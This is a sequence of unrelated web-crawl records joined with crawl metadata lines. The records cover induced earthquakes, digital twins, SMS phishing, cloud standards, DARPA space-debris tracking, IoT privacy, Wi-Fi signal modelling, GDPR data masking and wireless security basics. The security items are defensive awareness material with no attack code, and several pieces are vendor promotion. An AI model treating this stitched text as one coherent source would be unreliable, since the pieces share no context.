"There have been earthquakes of similar intensity and similar damage caused in the 17th, 18th and 19th centuries when there was no excess water extraction," said Jose Martinez Diez, a professor in geodynamics at Madrid's Complutense University who has also published a paper on the quake.
Still, it isn't the first time that earthquakes have been blamed on human activity, and scientists say the incident points to the need to investigate more closely how such quakes are triggered and how to prevent them.
The biggest man-made quakes are associated with the construction of large dams, which trap massive amounts of water that put heavy pressure on surrounding rock.
The 1967 Koynanagar earthquake in India, which killed more than 150 people, is one such case, said Marco Bohnhoff, a geologist at the German Research Centre for Geosciences in Potsdam who wasn't involved in the Lorca study.
Bohnhoff said smaller man-made quakes can also occur when liquid is pumped into the ground.
A pioneering geothermal power project in the Swiss city of Basel was abandoned in 2009 after it caused a series of earthquakes. Nobody was injured, but the tremors caused by injecting cold water into hot rocks to produce steam resulted in millions of Swiss francs (dollars) damage to buildings.
Earlier this year, a report by the National Research Council in the United States found the controversial practice of hydraulic fracturing to extract natural gas was not a huge source of man-made earthquakes. However, the related practice of shooting large amounts of wastewater from "fracking" or other drilling activities into deep underground storage wells has been linked with some small earthquakes.
In an editorial accompanying the Lorca study, geologist Jean-Philippe Avouac of the California Institute of Technology said it was unclear whether human activity merely induces quakes that would have happened anyway at a later date. He noted that the strength of the quake appeared to have been greater than the stress caused by removing the groundwater.
"The earthquake therefore cannot have been caused entirely by water extraction," wrote Avouac. "Instead, it must have built up over several centuries."
Still, pumping out the water may have affected how the stress was released, and similar processes such as fracking or injecting carbon dioxide into the ground — an idea that has been suggested to reduce the greenhouse effect — could theoretically do the same, he said.
Once the process is fully understood, "we might dream of one day being able to tame natural faults with geo-engineering," Avouac said.
Jordans reported from Istanbul. Ciaran Giles in Madrid and AP Science Writer Alicia Chang in Los Angeles contributed to this report. | <urn:uuid:45a08675-17c3-4e7f-b61f-042abe570ce2> | CC-MAIN-2017-09 | http://www.continuityinsights.com/news/2012/10/scientists-link-deep-wells-deadly-spain-quake | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00564-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.9775 | 1,189 | 3.234375 | 3 |
The Digital Twin
How smart factories and connected assets in the emerging Industrial IoT era along with the automation of machine learning and advancement of artificial intelligence can dramatically change the manufacturing process and put an end to the dreaded product recalls in the future.
In recent news, Samsung Electronics Co. has initiated a global recall of 2.5 millions of their Galaxy Note 7 smartphones, after finding that the batteries of some of their phones exploded while charging. This recall would cost the company close to $1 Billion.
This is not a one-off incident.
Product recalls have plagued the manufacturing world for decades, right from food and drug to automotive industries, causing huge losses and risk to human life. In 1982, Johnson & Johnson recalled 31 million bottles of Tylenol which retailed at $100 million after 7 people died in Chicago-area. In 2000, Ford recalled 20 million Firestone tires losing around $3 billion, after 174 people died in road accidents due to faulty tires. In 2009, Toyota issued a recall of 10 million vehicles due to numerous issues including gas pedals and faulty airbags that resulted in $2 billion loss consisting of repair expenses and lost sales in addition to the stock prices dropping more than 20% or $35 billion.
Most manufacturers have very stringent quality control processes for their products before they are shipped. Then how and why do these faulty products make it to the market which poses serious life risks and business risks?
Koh Dong-jin, president of Samsung’s mobile business, said that the cause of the battery issue in Samsung Galaxy Note 7 device was “a tiny problem in the manufacturing process and so it was very difficult to find out“. This is true for most of the recalls that happens. It is not possible to manually detect these seemingly “tiny” problems early enough before they result in catastrophic outcomes.
But this won’t be the case in the future.
The manufacturing world has seen 4 transformative revolutions:
- 1st Industrial Revolution brought in mechanization powered by water and stream.
- 2nd Industrial Revolution saw the advent of the assembly line powered by gas and electricity
- 3rd Industrial Revolution introduced robotic automation powered by computing networks
- The 4th Industrial Revolution has taken it to a completely different level with smart and connected assets powered by machine learning and artificial intelligence.
It is this 4th Industrial Revolution that we are just embarking on that has the potential to transform the face of the manufacturing world and create new economic value to the tune of tens of trillions of dollars, globally, from costs savings and new revenue generation. But why is this the most transformative of all revolutions? Because it is this revolution that has transformed mechanical lifeless machines into digital life-forms with the birth of the Digital Twin.
Digital Twin refers to the computerized companions (or models) of the physical assets that use multiple internet-connected sensors on these assets to represent their near real-time status, working condition, position, and other key metrics that help understand the health and functioning of these assets at granular levels. This helps us understand asset and asset health like we understand humans and human health, with the ability to do diagnosis and prognosis like never before.
How can this solve the recall problem?
Sensor enabling the assembly line and creating Digital Twin of all the individual assets and workflows provides timely insights into tiniest of the issues that can otherwise be easily missed in the manual inspection process. This can detect causes and predict potential product quality issues right in the assembly line as early as possible so that the manufacturers can take proactive action to resolve them before they start snowballing. This can not only prevent recalls but also reduce scraps in the assembly line taking operational efficiency to unprecedented heights.
What is so deterrent? Why is this problem not solved most organizations that have smart-enabled their factories?
The traditional approach of doing data science and machine learning to analyze data doesn’t scale for this problem. Traditionally, predictive models are created by taking a sample of data from a sample of assets and then these models are generalized for predicting issues on all assets. While this can detect common known issues, which otherwise get caught in the quality control process itself, but it fails to detect the rare events that cause the massive recalls. Rare events have failure patterns that don’t commonly occur in the assets or the assembly line. Although, highly sensitive generalized models can be created to detect any and all deviations but that would generate a lot of false positive alerts which cause a different series of problems altogether. The only way to ensure that we get accurate models that detect only the true issues is to model each asset and the workflow channels individually, understand their respective normal operating conditions and detect their respective deviations. But this is what makes this challenge beyond human-scale. When there are hundreds, thousands or millions of assets and components it is impossible to keep generating and updating models for each one of them manually. It requires automation of the predictive modeling and the machine learning process itself, as putting human data scientists in the loop doesn’t scale.
But aren’t there standard approaches or scripts to automate predictive modeling?
Yes, there are. However, these plain vanilla automation of modeling process which just runs all permutations of algorithms and hyper-parameters again doesn’t work. The number of assets and as such the number of individual models, the frequency at which models need to be updated to capture newer real-world events, the volume of the data and the wide variety of sensor attributes all create prohibitive computational complexity (think millions or billions of permutations), even if someone has infinite infrastructure to process them. The only solution is Cognitive Automation, which is an intelligent process that mimics how a human data scientists leverage prior experience to run fewer experiments to get to an optimal ensemble of models in the fastest possible way. In short, this is about teaching machines to do machine learning and data science like an A.I. Data Scientist.
This is the technology that is required to give Digital Twin a true life-form that delivers the end business value – in this case to prevent recalls.
Does it sound like sci-fi?
It isn’t and it is already happening with the advancement in the world of machine learning and artificial intelligence. Companies like Google are using algorithms to create self-driving cars or beat world champions in complex games. At the same time, we at DataRPM are using algorithms to teach machines to do data analysis and detect asset failures and quality issues on the assembly line. This dramatically improves operational efficiency and prevents the product recalls.
The future, where the dreaded product recalls will be a thing of the past, is almost here!
By Ruban Phukan, Co-Founder and Chief Product & Analytics Officer, DataRPM | <urn:uuid:b9084231-eba9-43aa-a1a1-6acf09be7c20> | CC-MAIN-2017-09 | https://cloudtweaks.com/2016/09/digital-twin-end-dreaded-product-recall/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172783.57/warc/CC-MAIN-20170219104612-00264-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.942158 | 1,380 | 2.703125 | 3 |
“SMiShing” is a silly word—even sillier than “phishing,” but equally dangerous.
Phishing occurs when scammers send emails that appear to have been sent by legitimate, trusted organizations in order to lure recipients into clicking links and entering login data and other credentials. The term is a reference to the scammers’ strategy of luring the victim with bait and thus, fishing for personal information.
SMiShing is a version of phishing in which scammers send text messages rather than emails, which appear to have been sent by a legitimate, trusted organization and request that the recipient click on a link or provide credentials in a text message reply. The term is a condensed way of referring to “short message service phishing,” or “SMS phishing.”
Criminal hackers have access to technology that generates cell phone numbers based on area code, then plugging in a cell carrier’s given extension, then generating the last four numbers. They then use a mass text messaging service to distribute their SMiShing bait. (An online search for “mass sms software” turns up plenty of free and low-fee programs that facilitate mass texting.)
This ruse tends to be effective because while most of us have learned to recognize phishing emails, we are still conditioned to trust text messages. Also, there’s no easy way for us to preview links in a text message like we can if we are viewing an email on a PC.
Some SMiShers send texts with links that, if clicked, will install keyloggers or lead to malicious websites designed to steal personal data, while others trick targets into calling numbers that rack up outrageous charges to their phone bills.
To protect yourself from SMiShing:
- Be aware of how this type of scam works. Once you understand how it works, you are better positioned to recognize smishing
- Avoid clicking links within text messages, especially if they are sent from someone you don’t know
- Don’t respond to text messages requesting personal information
- Consider using a comprehensive mobile security application that includes SMS (text) filtering as well as anti-theft, antivirus and web protection like McAfee Mobile Security. | <urn:uuid:faa2505d-0beb-446a-bde3-6ec9d7493d42> | CC-MAIN-2017-09 | https://securingtomorrow.mcafee.com/consumer/family-safety/protect-yourself-from-smishing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00085-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.919448 | 471 | 3.140625 | 3 |
Necessity is the mother of invention – Plato
Gartner’s “Hype Cycle for Emerging Technologies 2012” predicts that cloud computing will reach a plateau of productivity in 2-5 years’ time. The key enabling technologies for this are fast wide area networks, powerful expensive server computers and high performance virtualization for commodity hardware. However, a lack of standardization to guide development, deployment and integration efforts around technical challenges like interoperability, portability and reusability, and business concerns like security/compliance, regulation/jurisdiction and vendor lock-in are cited as major barriers for wider adoption and success.
NIST (National Institute of Standards and Technology) cloud computing standards roadmap report published in 2011 well documents the fact that broad standards are already available in support of certain functions and requirements for cloud computing. While most of these standards were developed in support of pre-cloud computing technologies, such as those designed for web services and the Internet, they also support the functions and requirements of cloud computing. Other standards are now being developed in specific support of cloud computing functions and requirements, such as virtualization.
The NIST report further goes to state that from a standardization point, the cloud interfaces presented to cloud users can be broken down into two major categories, with interoperability determined separately for each category.
The interface that is presented to (or by) the contents of the cloud encompasses the primary function of the cloud service. This is distinct from the interface that is used to manage the use of the cloud service.
Now, if we have to understand this in Infrastructure as a Service (IaaS) cloud offering parlance, the NIST report elucidates that the functional interface is a virtualized Central Processing Unit (CPU), memory and input/output (I/O) space typically used by an operating system (and the stack of software running in that operating system [OS] instance).
The cloud user utilizes the management interface to control their use of the cloud service by starting, stopping, and manipulating virtual machine images and associated resources. It should be clear from this that the functional interface for an IaaS cloud is very much tied to the architecture of the CPU being virtualized. This is not a cloud-specific interface, and no effort is being put into a de jure standard for this interface since de facto CPU architectures are the norm.
The self-service IaaS management interface, however, is a candidate for interoperability standardization.
From a functional viewpoint Platform as a Service, PaaS is a set of libraries and components to which the application is written mostly to take advantage of existing application platforms standards such as those found in J2EE or DOTNET.
SaaS application leverages the standards designed for web services and the internet.
Apart from interoperability, there is a lot of focus on cloud portability as the means to prevent being locked into any particular cloud or service provider. Portability is generally the ability to move applications and data from one computing environment to another. Standards are fundamental to achieve portability.
Security ensuring the confidentiality, integrity, and availability of information and information systems forms the 3rd aspect where a standardized approach is warranted to alleviate the high priority concerns and perceived risks related to cloud computing.
Forrester predicts IaaS will become more standardized by 2015, which is somewhat in line with Gartner’s hype cycle prediction. There’s a lot of effort taking place which is worth looking at.
DMTF’s (Distributed Management Task Force, Inc.) Virtualization Management (VMAN) Virtualization Profiles have achieved ANSI adoption. As DTMF defines it, the VMAN standard is comprised of two components: the Open Virtualization Format (OVF) specification, which provides a standard format for packaging and describing virtual machines and applications for deployment across virtualization platforms, and the Virtualization Profiles, which standardize many aspects of the operational management of a virtualized environment. Together, these components deliver broadly supported interoperability and portability standards to virtual computing environments for deploying pre-configured solutions across heterogeneous computing networks.4
Next in line from the DMTF stable is CIMI (Cloud Infrastructure Management Interface). Version one has been released, and the specification standardizes interactions between cloud environments to achieve interoperable cloud infrastructure management between service providers and their consumers and developers. CIMI is developed as a self-service interface for infrastructure clouds which allows users to dynamically provision configure and administer their cloud usage.4
Coming to Data portability, SNIA (Storage Networking Industry Association) is behind CDMI which defines the functional interface that applications will use to create, retrieve, update and delete data elements from the cloud. As part of this interface the client will be able to discover the capabilities of the cloud storage offering and use this interface to manage containers and the data that is placed in them. In addition, metadata can be set on containers and their contained data elements through this interface.5
Service-Oriented Cloud Computing Infrastructure Framework (SOCCI), made available by the Open Group, is for enterprises that wish to provide infrastructure as a service in the cloud and SOA. It outlines the concepts and architectural building blocks necessary for infrastructures to support SOA and cloud initiatives.
On the open source side, OpenStack, the initiative with the largest vendor community, is creating a lot of de facto standards for operating systems that will be deployed on the cloud.
Open Cloud Computing Interface (OCCI) published by Open Grid Forum, is a RESTful boundary protocol and API that acts as a service front-end to a provider’s internal management framework. OCCI describes APIs that enable cloud providers to expose their services. It allows the deployment, monitoring and management of virtual workloads (like virtual machines), but is applicable to any interaction with a virtual cloud resource through defined http(s) header fields and extensions. 6 OCCI endpoints can function either as service providers or service consumers, or both. Further, the OCCI working group and the OpenStack team are working together to deliver an OCCI implementation in OpenStack.
The nonspecific web and internet technology standards enabling the cloud are TCP/IP, HTTP, HTML, SSL, TLS XML, JSON, DNS, etc.
Another point worth mentioning here is SDN (Software Defined Networking), and understanding how it shall impact cloud computing. The SDN approach makes virtual networking with elastic resource allocation which is an engineering realization of network reaction to application requirement.
SDN separates the control plane from the data plane in network switches and routers. Under SDN, the control plane is implemented in software in servers separate from the network equipment, and the data plane is implemented in commodity network equipment. The Open Networking Foundation has specified the OpenFlow protocol standard as an implementation of SDN.
Now , what we get combining all these is shared pool of configurable computing resources, e.g., networks, servers and storage, that can be rapidly provisioned , orchestrated and released in a standardized way.
The industry is already warming up to this prospect, which is evident from the early steps taken in this direction. Notable is CISCO’s ONE (Open Network Environment) that brings together CISCO, OpenStack and OpenFlow.
A few questions still remain to be answered. How do industry behemoths VMware and Microsoft plan to integrate standardization in their next product plan? What role could TSPs/carriers play in shaping standardization for cloud computing? Read about HCL's suite of services here.
- Hype Cycle – http://www.gartner.com/it/page.jsp?id=2124315
- NIST – http://www.nist.gov/itl/cloud/index.cfm#
- Forrester – http://blogs.forrester.com/james_staten/11-12-02-when_will_we_have_iaas_cloud_standards_not_till_2015
- DMTF – http://dmtf.org/
- CDMI – http://www.snia.org/cdmi
- SOCCI – http://www.opengroup.org/soa/source-book/socci/intro.htm
- CISCO – http://www.theregister.co.uk/2012/06/14/cisco_one_sdn_openflow_openstack/ | <urn:uuid:887192e7-d12d-47ae-aa83-6965274f08d5> | CC-MAIN-2017-09 | https://www.hcltech.com/blogs/engineering-and-rd-services/cloud-computing-standards | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00085-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.913955 | 1,756 | 2.546875 | 3 |
Major Characteristics of Simulation
Simulation is a specialized type of modeling tool. Most models represent or abstract reality, while simulation models usually try to imitate reality. In practical terms, this means that there are fewer simplifications of reality in simulation models than in other quantitative models. Simulation models are generally complex.
Second, simulation is a technique for performing "What-If" analysis over multiple time periods or events. Therefore, simulation involves the testing of specific values of the decision or uncontrollable variables in the model and observing the impact on the output variables.
Simulation is a descriptive tool that can be used for prediction. A simulation describes and sometimes predicts the characteristics of a given system under different circumstances. Once these characteristics are known, alternative actions can be selected. The simulation process often consists of the repetition of a test or experiment many times to obtain an estimate of the overall effect of certain actions on the system.
Finally, simulation is usually needed when the problem under investigation is too complex to be evaluated using optimization models. Complexity means that the problem cannot be formulated for optimization because assumptions do not hold or because the optimization formulation is too large and complex. | <urn:uuid:5620387c-2faa-457f-9c61-1d6ddab31b80> | CC-MAIN-2017-09 | http://dssresources.com/subscriber/password/dssbookhypertext/ch9/page20.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171971.82/warc/CC-MAIN-20170219104611-00437-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.915422 | 232 | 3.46875 | 3 |
There is really so much junk floating around in space the government needs help keeping track of it all. This week the Defense Advanced Research Projects Agency announced a program to utilize amateur astronomers to help watch space for any dangerous junk that maybe be threatening satellites or other spacecraft and even the Earth. If you have a telescope, great but the program will even install equipment if you are in a strategic area the government want to watch.
DARPA's program , known as SpaceView is strategically aimed at offering more diverse data to the Space Surveillance Network (SSN), a US Air Force program charged with cataloguing and observing space objects to identify potential near-term collisions.
With SpaceView DARPA will provide "state of the art hardware and relatively minor financial compensation may be provided in exchange for the shared telescope time, site security, and routine maintenance. This allows the SpaceView concept to significantly reduce deployment costs when compared to traditional optical space-surveillance facilities. Equally important, remote observing and the availability of the local SpaceView member for troubleshooting eliminates the need for any paid employees at the site, further decreasing operational costs," DARPA stated.
According to the agency, SpaceView is in its initial developmental phase which consists of developing the network architecture and demonstrating the ability to remotely and automatically operate a network of sites from a central location. A large part of developing the network architecture consists of determining the needs of the amateur astronomy community so that these needs can be aligned with the space surveillance needs of SpaceView, DARPA stated.
If you are interested in signing up go here. According to DARPA, by providing contact information and the answers to a few basic questions you will be helping us to begin the process of gathering the information we need to develop the network architecture concept more thoroughly. Once your information has been received by SpaceView interested parties will most likely receive a link via email to a questionnaire requesting more detailed information regarding your astronomy background, observing habits, as well as other demographic information. This information will be used by SpaceView to determine the habits and needs of candidate network members.
NASA estimates more than 500,000 pieces of hazardous space debris orbit the earth, threatening satellites that support peacekeeping and combat missions.
Examples of what NASA calls orbital debris include: "Derelict spacecraft and upper stages of launch vehicles, carriers for multiple payloads, debris intentionally released during spacecraft separation from its launch vehicle or during mission operations, debris created as a result of spacecraft or upper stage explosions or collisions, solid rocket motor effluents, and tiny flecks of paint released by thermal stress or small particle impacts. "
According to NASA the Top 10 space junk producing missions are:
Name Year of Breakup Debris items Cause of Breakup
- Fengyun-1C 2007 2,841 Intentional Collision
- Cosmos 2251 2009 1,267 Accidental Collision
- STEP 2 Rocket Body 1996 713 Accidental Explosion
- Iridium 33 2009 521 Accidental Collision
- Cosmos 2421 2008 509 Unknown
- SPOT 1 Rocket Body 1986 492 Accidental Explosion
- OV2-1 Rocket Body 1965 473 Accidental Explosion
- Nimbus 4 Rocket Body 1970 374 Accidental Explosion
- TES Rocket Body 2001 370 Accidental Explosion
- CBERS 1 Rocket Body 2000 343 Accidental Explosion
Check out these other hot stories: | <urn:uuid:8c5c6509-d8e0-4621-8407-12f11f0bced2> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2223503/security/darpa-wants-army-of-networked-amateur-astronomers-to-watch-sky-for-space-junk.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171971.82/warc/CC-MAIN-20170219104611-00437-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.89902 | 687 | 3.015625 | 3 |
The “Internet of Things” is here.
Americans are adapting to a world in which virtually everything — from cellphones and cars to washing machines and refrigerators — is going to be connected to the Internet or networks. Many of these devices will — and do — “talk” to one another via tiny sensors that function almost like human senses, logging information such as temperature, light, motion and sound.
Theoretically, the sensors could allow a new refrigerator, for example, to send an alert to a homeowner’s smartphone whenever the fridge is running low on milk. This concept of device conversation is known as the Internet of Things. The technology will make life easier, but it also means more people are vulnerable to device malfunction or hacking.
Experts and government officials acknowledge the transformative power of the Internet of Things. But the authors of a White House report in May on the effects of big data — including all the information that devices collect — are also concerned about the potential for privacy abuses that comes with the technology.
These innovations raise “considerable questions about how our framework for privacy protection applies in a big data ecosystem,” the report says. And the rate of development is only picking up pace.
Deepti Rohatgi, a policy adviser at Lookout, a mobile security firm in San Francisco, said that each day more than 30,000 new apps were created for almost a billion mobile devices. Further, a 2011 report from Cisco Systems, which designs, makes and sells computer networking devices, projected that by the year 2020, some 50 billion devices will be connected to the Internet or networks, an average of just under seven connected devices per person.
Rohatgi said that one of the ways to ensure information security was to follow the example of Google Glass, a wearable computer that looks like eyeglasses but works like a smartphone.
Google launched an “Explorer Program” last year that allowed individuals — specifically developers and hackers — an opportunity to test the prototype. Not only did this give Google a chance see how the public would react to the technology, but it also allowed people with technical know-how to alert Google to potential privacy problems they found in the new product.
That’s exactly what happened, Rohatgi said.
“Lookout got ahold of a Google Glass and we found a vulnerability with some of their software,” she said. “We reported it to Google, and they patched it immediately. That’s a great example of how they were willing to share their technology with a group of hackers to say, ‘Help us find what the problems are before they’re released to the public.’ “
The White House report cites several examples of how tech innovation and big data are being used.
Lights can detect sound, speed, temperature and carbon monoxide levels from parking lots, schools and public streets; vehicles can record driving data that can be used to build better and safer transportation systems; and some home appliances can tell owners when to dim lights even when they’re thousands of miles away.
Most of the data these devices collect is innocuous. But there’s still a chance, if small, that third parties could hack in and get very detailed pictures of their users’ lives. Worse, it’s possible that a malfunction — with, say, a “smart” toaster — might cause a fire when no one is home, or a malicious person would hack into a car that’s traveling on the interstate at 70 mph.
“Once the Internet of Things is fully blossomed, there are going to be billions of devices with billions of sensors, and having a human review how every piece of software touches those sensors — it’s impossible,” Rohatgi said.
Because it’s impossible to review all that code, conversations between inventors and developers are crucial, she said.
“Talking to folks who are really familiar with how these devices can be used for harm, educating them on what good practices are, what are best practices and just having a dialogue with people” before a product is released is “incredibly important,” Rohatgi said.
April marked 41 years since the world’s first mobile phone call was made. Martin Cooper, who conceived the idea while working for Motorola in the 1970s, led the team that ultimately developed and marketed the cellphone.
Despite privacy concerns, Cooper remains optimistic about the future of the Internet of Things.
“We are most productive when we use wireless technology,” he said recently at a conference in Washington.
He cited poverty, health care and education as three major worldwide issues that can be transformed by continued innovation.
“In each of those areas,” Cooper said, “we are on the verge of revolutions.”
The Medill News Service is a Washington program of the Medill School of Journalism at Northwestern University. | <urn:uuid:c97a9091-f4ad-42ed-8850-7927177fd5bd> | CC-MAIN-2017-09 | http://www.govtech.com/internet/Experts-Gov-Officials-Acknowledge-Transformative-Power-of-the-Internet-of-Things.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00613-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949699 | 1,028 | 3.078125 | 3 |
A home's Wi-Fi dead zones are, to most of us, a problem solved with guesswork. Your laptop streams just fine in this corner of the bedroom, but not the adjacent one; this arm of the couch is great for uploading photos, but not the other one. You avoid these places, and where the Wi-Fi works becomes a factor in the wear patterns of your home. In an effort to better understand, and possibly eradicate, his Wi-Fi dead zones, one man took the hard way: he solved the Helmholtz equation.
The Helmholtz equation models "the propagation of electronic waves" that involves using a sparse matrix to help minimize the amount of calculation a computer has to do in order to figure out the paths and interferences of waves, in this case from a Wi-Fi router. The whole process is similar to how scattered granular material, like rice or salt, will form complex patterns on top of a speaker depending on where the sound waves are hitting the surfaces.
The author of the post in question, Jason Cole, first solved the equation in two dimensions, and then applied it to his apartment's long and narrow two-bedroom layout. He wrote that he took his walls to have a very high refractive index, while empty space had a refractive index of 1.
Cole found in his simulation he could get pretty good coverage even with his router in one corner of the room, but could get "tendrils of Internet goodness" everywhere if he placed the router right in the center of the apartment. In a simulation where he gave the concrete some absorption potential, he found a map more like what he expected: excellent reception immediately around the router, and beams that shone into various rooms with periodic strong spots from the waves' interference.
When he introduced time to the system, Cole was able to simulate how his apartment might fill with waves over a certain period and eventually become an oscillating standing wave forming pockets of high activity. For instance, the Wi-Fi signal hits a pretty good curve around the doorway into the second bedroom for good reception in a band a couple of feet wide down the center; there's also surprisingly good signal behind a thick wall in the upper right corner of the floor plan.
Cole writes that making the mapping simulation a Web service would probably be unfeasible due to the intensive calculations and suggested he might "experimentally map the field strength [himself.]" Using an intensive mathematical process, he will have to slowly amble around his apartment, holding a computer, clicking things to see if they go any faster here… or here… or here, like the rest of us. | <urn:uuid:cf4a9ba2-56c5-4e19-a507-95987dc2acde> | CC-MAIN-2017-09 | https://arstechnica.com/gadgets/2014/08/mapping-wi-fi-dead-zones-with-physics-and-gifs/?comments=1 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00613-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.964377 | 539 | 2.828125 | 3 |
What is General Data Protection Regulation (GDPR)?
In a world of intellectual property theft, data breaches, and other cybercrimes, governments are creating regulations that require companies to take appropriate care when handling confidential personal data. The European Union's (EU) General Data Protection Regulation (GDPR) is a new, sweeping regulation that compels businesses to lock down sensitive customer information such as names, email addresses, or payment information.
The GDPR, which becomes law in 2018, sets strict limits on any business that collects, uses, or shares data from European citizens, encompassing firms based both inside and outside of the EU. Businesses that fail to implement appropriate data protective measures will face harsh penalties, including fines as great as 4% of global revenue--enough to jeopardize ongoing European operations for any corporation selling within the EU.
Data Masking and GDPR
To comply with the EU GDPR, firms must implement technical and organizational measures to secure personal information. More specifically, GDPR creates a strong imperative for companies to reevaluate how they store, manage, and protect data in on-premises data centers and cloud environments.
While stopping short of explicitly recommending specific solutions, GDPR urges businesses to consider technologies used to anonymize customer data. One such technology is data masking, an approach that transforms sensitive data values into fictitious, but realistic equivalents. Data masking de-identifies data to support GDPR compliance, but also preserves the format and consistency of the resulting data so that it remains valuable to operational analysts, software developers, or test engineers.
Data masking has become the de facto standard for protecting non-production data–data that resides in environments for development, testing, and reporting. Thus, it is critical in achieving EU GDPR compliance for non-production environments that often contain over 90% a firm's sensitive data.
Delphix Data Masking for GDPR Compliance
To make data masking for GDPR practical and effective, businesses must not only mask sensitive data, but also implement a solution for quickly delivering masked data to downstream environments. Legacy approaches to data masking are manual and resource-intensive, involving coordination across multiple teams that slows data delivery and limits masking coverage.
Delphix, however, seamlessly combines data masking with data virtualization technology to address the secure data delivery challenge head-on while complying with GDPR. With Delphix, firms can efficiently and automatically mask sensitive data, then deliver that secure data to downstream environments in just minutes, via self service. | <urn:uuid:01c4d198-edfb-44e5-8567-c407769b1c1e> | CC-MAIN-2017-09 | https://www.delphix.com/solutions/data-masking/gdpr | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00557-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.890249 | 513 | 2.9375 | 3 |
Managing Security Risks in a Wireless World
Wireless networks are extremely prevalent today, both at home and in work settings. This increased adoption of wireless networks can be attributed to lower cost and ease of installation, combined with benefits such as increased portability and productivity.
Setting up wireless networks generally does not require drilling holes or cabling. All you need to do to connect is plug in a wireless access point (AP) or router. The lack of cabling expands a network to one without a physical boundary and allows an end user to be portable and productive from anywhere within the wireless network range.
This open connectivity brings with it risks, however, some of which are similar to those in wired networks, while others are unique and increased on wireless networks. Poor security standards, coupled with immature technologies, flawed implementations and limited user awareness, make it difficult to design and deploy “secure” wireless networks. All the vulnerabilities of wired networks exist in wireless networks as well. The most noteworthy is the openness of the communication medium (airwaves). This is akin to storing valuables in a glass safe.
Wireless security threats include confidentiality, integrity and availability (CIA) of resources and information. Organizations have information to protect. This information can be financial, personal and intellectual, all of which can be sensitive. Unauthorized intruders can intercept and gain access, disclosing sensitive information (confidentiality breach) if encryption and other protective mechanisms between wireless devices are weak or vulnerable.
Disclosed information can be altered (integrity breach) intentionally by the intruder or unintentionally due to malfunction in data-synchronization routines between the wireless clients and the back-end storage. Intruders can launch attacks against wireless devices in the network and consume network bandwidth causing Denial of Service (DoS) attacks (availability breach), as well.
Know Your Enemy
Sixth-century Chinese general and master military strategist Sun Tzu, in his book Art of War, wrote: “Know your enemy and know yourself, find naught in fear for 100 battles.”
Enemies and threat agents that exploit wireless security vulnerabilities can be grouped into three major categories:
Script kiddies ($cr1p7k1dd13s): These enemies are motivated primarily by the thrill of electronically trespassing and are deterred quite easily by simple security measures. They usually are unaware of the consequences of breach and use tools and scripts readily available to gain access to networks on which they are not authorized. They are the least of the threats and are also referred to as “war dialers.”
Resource thieves: They consume resources such as bandwidth and disk space, downloading pirated movies, MP3 and pornography using stolen airwaves and networks. They, like script kiddies, are motivated by thrill of freeloading and the need to be untraced. They are capable of writing scripts to exploit vulnerabilities, but often look for easily exploitable vulnerabilities and don’t pose a significantly greater threat than script kiddies.
Information thieves: They know exactly what they want (sensitive information), know how to get it, know how to hide their footprints and are capable of harm. They are not easily deterred and often go the extra mile in figuring out the network topology to gain access to the network.
The 5 W’s of Wireless Networks
With the understanding of the risks and threat agents associated with wireless networks, important questions one must answer before designing and implementing secure wireless networks are:
Why do you need to set up a wireless network? Ease of access (flexibility), unrestricted workspace (portability and productivity).
Where are you setting up the wireless network? Home, work, public location.
Who will be using your wireless networks? Internal employees, vendors, customers, general public. What is it that you need to safeguard? Customer information, financial information, intellectual property, trade secrets.
When should you setup a wireless network? The right time to setup a wireless network is when you can acceptably manage and mitigate risks.
At a bare minimum, the following should be in place to thwart intruders in wireless networks:
Change all default settings. Most wireless devices (routers and APs) come with weak default configurations. Blank admin passwords or “admin/admin” username password combinations are classic examples. Due to flawed implementation and limited user awareness and education on the implications of deployment of these wireless devices with default configurations, many wireless networks are susceptible to security threats.
Select products that can support more secure technologies. For backward compatibilities, if you are required to support weaker security technologies like Wired Equivalent Privacy (WEP) instead of Wi-Fi Protected Access (WPA and WPA2), do so only after doing a risk analysis and developing a plan to phase them out with products that can support more secure technologies. E.g., more secure technologies are WPA and client AP isolations in which the client devices on your wireless network cannot see one another.
Educate, train and certify users and employees. This is the most proactive approach to implementing security in wireless networks. There is no greater defense than educated and trained personnel making wise decisions pertinent to wireless security.
Get employees certified in wireless security. The Certified Information Systems Security Professional (CISSP) credential by (ISC)2 is a Gold Standard certification that covers wireless security concepts. Another good vendor-neutral certification is the Certified Wireless Security Professional (CWSP) by CWNP.
Placebo Wireless Security
Some of the most common wireless security measures are myths and give a false sense of security. These include:
SSID cloaking: The Service Set Identifier (SSID) in a wireless AP is the name configured to be broadcast to client devices (laptop, PDAs) so that they can associate with the AP. In SSID cloaking, the SSID is not broadcast by the AP, but is distributed by out-of-band mechanisms beforehand to the wireless network users. Most organizations use SSID cloaking as a security measure. Although this is a recommended best-practice by the PCI Data Security Standard (PCI DSS), it provides little to no protection because every time a client associates with an AP, the SSID is present in clear text, and a man-in-the-middle (MITM) attack can deduce the SSID, allowing an intruder to easily bypass any intended security mechanism.
MAC address filtering: Every network device has a unique machine access code (MAC). Allowing access to your wireless networks based on MAC addresses is akin to having a bouncer with a valid set of names to allow into the party. With a plethora of MAC spoofing tools, coupled with the MAC address being sent in the header of every packet, MAC address filtering easily can be defeated.
